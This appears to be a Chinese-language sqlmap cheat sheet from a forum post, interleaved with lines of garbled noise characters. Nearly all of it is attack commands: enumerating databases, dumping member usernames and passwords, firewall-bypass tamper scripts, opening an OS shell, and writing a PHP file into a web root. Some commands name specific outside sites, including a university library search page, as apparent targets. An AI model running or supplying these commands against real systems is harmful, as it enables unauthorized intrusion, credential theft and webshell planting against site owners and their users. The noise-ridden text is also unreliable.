sqlmap使用实例

admin

/pentest/database/sqlmap
* F/ p- e  Q. N/ |
update :::::>     in the folder   after  execute    following   order : svn update
" X) }0 g, c+ E2 M+ T
sqlmap.py -r 1.txt --current-db
+ Q3 ]: w3 V' ^  y/ o, D
) j2 w3 F7 w, |7 X3 o# A: ~$ Uv 3 –dbms “MySQL” –technique U -p id –batch –tamper “space2morehash.py”
6 L6 I# a6 ^2 S0 k2 ]8 z- O
==================基本使用方法==========================elect (select concat(0x7e,0x27,username,0x3a,password,0x27,0x7e) from phpcms_member limit 0,1))
, ?' H3 P  A. Y. W  A猜解数据库
+ `$ U0 e7 D* y) S  o" _% X./sqlmap.py -u "injection-url" --dbs
sqlmap.py -r 1.txt -v 3 --dbs --tamper "space2morehash.py"

# |0 @6 m. Z+ Z% ?. f' l+ @7 R猜解表名
./sqlmap.py -u "injection-url" -D database_name --tables
( c" @' }: W" S1 _$ H9 D
sqlmap.py -r 1.txt -v 1 -D jsst --tables --batch --tamper "space2morehash.py"
# p. C0 Y5 c/ ?& ?6 {8 ksqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member_info --columns --batch --tamper "space2morehash.py"
, o0 o7 k, t( y& N2 k' T. H; k) k
sqlmap.py -r 1.txt -D mail -T F_domain -C F_email,F_password --dump
5 j4 T, V* J5 {" ]8 v" u" }
sqlmap.py -r 1.txt -v 1 --os-shell --tamper "chardoubleencode.py"
3 k) @# z6 w. _" \sqlmap.py -r 1.txt -v 3 --os-shell --tamper "chardoubleencode.py"
sqlmap.py -r 1.txt -v 3 --file-write c:\help.php --file-dest D:\Bitnami\wampstack-5.4.29-0\apache2\htdocs\en\fckeditor\help888.php --tamper "chardoubleencode.py"
sqlmap.py -r 1.txt --dbms "Mysql" --os-shell --tamper "charunicodeencode.py"

sqlmap.py -u "http://121.15.0.227/en/list.php?catid=74" --os-shell -v3 --tamper "charunicodeencode.py"
+ w( D( B$ i+ a/ Tsqlmap.py -r 1.txt -v 3 --sql-query "desc jsgen_member;" --batch --tamper "space2morehash.py"
4 M% [+ s5 n6 Bsqlmap.py -r 1.txt -v 3 --sql-query "show create table jsgen_member;" --batch --tamper "space2morehash.py"
sqlmap.py -r 1.txt -v 3 --sql-query "select user();" --batch --tamper "space2morehash.py"
! K- c6 A) @3 P$ p4 B/ O5 O) }sqlmap.py -r 1.txt -D jsst -T phpcms_member -C username,password --dump

- @/ s6 A/ O  N8 F) d4 k7 P+ zsqlmap.py -r 1.txt -v 3 --dbs  --batch --tamper "space2morehash.py" 绕过防火墙了
2 J+ v3 j8 N% D5 x8 f" r; T# tsqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member -C ,userid,username,password, --dump --batch --tamper "space2morehash.py"

sqlmap.py -r 1.txt --dbms "Mysql" --tables -D "jsst"
猜解列名
8 w' ^) |' ?! e/ z% Z./sqlmap.py -u "injection-url" -D database_name -T table_name --columns
. c( @" F% a& U8 q, D$ Q
sqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member --columns --batch --tamper "space2morehash.py"
8 Y; `3 L' e% M5 h9 tsqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_session --columns --batch --tamper "space2morehash.py"
% g) I- T! l2 R7 d$ isqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member -C userid,groupid,username,password,touserid,point,modelid,email,areaid --dump --batch --tamper "charunicodeencode.py"

  g' I. [+ Y0 u# |: usqlmap.py -u "http://cityusr.lib.cityu.edu.hk/jspui/simple-search?query=1" --batch --tamper "space2morehash.py"
. e8 ?) ^+ U5 m0 k$ r1 D&submit=Go
猜解值
./sqlmap.py -u "injection-url" -D database_name -T table_name -C column1,column2 --dump
========================================================
/ W1 c9 \8 I! ?$ _$ i& s: ?搜索表名中包括mana字符的
( A4 F- @$ o: ]4 e/ ?1 \# @( t2 m/sqlmap.py -u "injection-url" -T mana --search
返回一个交互式sql shell
/sqlmap.py -u "injection-url" --sql-shell
( W; z' O% R2 U  y/ @* p- t读取指定文件（需权限）
1 y6 j: n* G* @9 B; ~/sqlmap.py -u "injection-url" --file-read "c:\boot.ini"
/ L) @4 D/ Y$ z4 s查看当前 用户 及 数据库
/ a, e6 e5 c# }% ?/sqlmap.py -u "injection-url" --current-user --current-db
5 Y$ V2 h$ j/ _( k( H7 R2 U本地文件 写入 远程目标绝对路径
/sqlmap.py -u "injection-url" --file-write 本地路径 --file-dest 远程绝对路径
$ F' O$ R  ~$ b3 y4 `sqlmap.py -r 1.txt -v 3 --file-write c:\help.php --file-dest D:/Bitnami/wampstack-5.4.29-0/apache2/htdocs/en/fckeditor\help888.php --tamper "charunicodeencode.py"
* j/ u7 N4 v6 i# ]
sqlmap.py -u "injection-url" --file-write 本地路径 --file-dest 远程绝对路径
查看某用的权限
6 p: s9 J' Y! ^+ F7 c/sqlmap.py -u "injection-url" --privileges -U root
查看当前用户是否为dba
3 h, ]- a! ~3 u; p% D! l; J2 J/sqlmap.py -u "injection-url" --is-dba
9 X+ M4 F# S9 J4 A* S& _读取所有数据库用户或指定数据库用户的密码
* j1 d0 e5 s# E6 msqlmap.py -r 1.txt --users --passwords
sqlmap.py -r 1.txt -v 3 --users --passwords --batch --tamper "space2morehash.py"
6 y, X: W( |- T9 G  v
/sqlmap.py -u "injection-url" --passwords -U root

--start&&--stop 与 --first&&--last 的区别
9 [2 B. R. u/ C4 P/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" -D phpcms -T phpcms_member --start=1 --stop=2 --dump   （--start=1 --stop=2 会列出第二条记录。。。。记录例如：0 1 2 3 ……）
3 `* m  T, v+ e3 J$ Q. c4 i
3 v& U- `& ?" m% O% Z/ d: s1 z从字典中查找(属于暴利破解)存在的表（sqlmap/txt/common-tables.txt）或字段（sqlmap/txt/common-columns.txt）
/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" -D database-name --common-tables
$ K" F2 G! S2 k2 H( f/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" -D database-name -T table_name --common-columns

执行sql语句，如查询@@datadir得到数据库路径（或者user()/database()等等……）
/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" --sql-query "select @@ip"
$ ]: }) T" a- y7 l; ?, h3 d
  y& P+ Y% i! s  S$ ]' d. M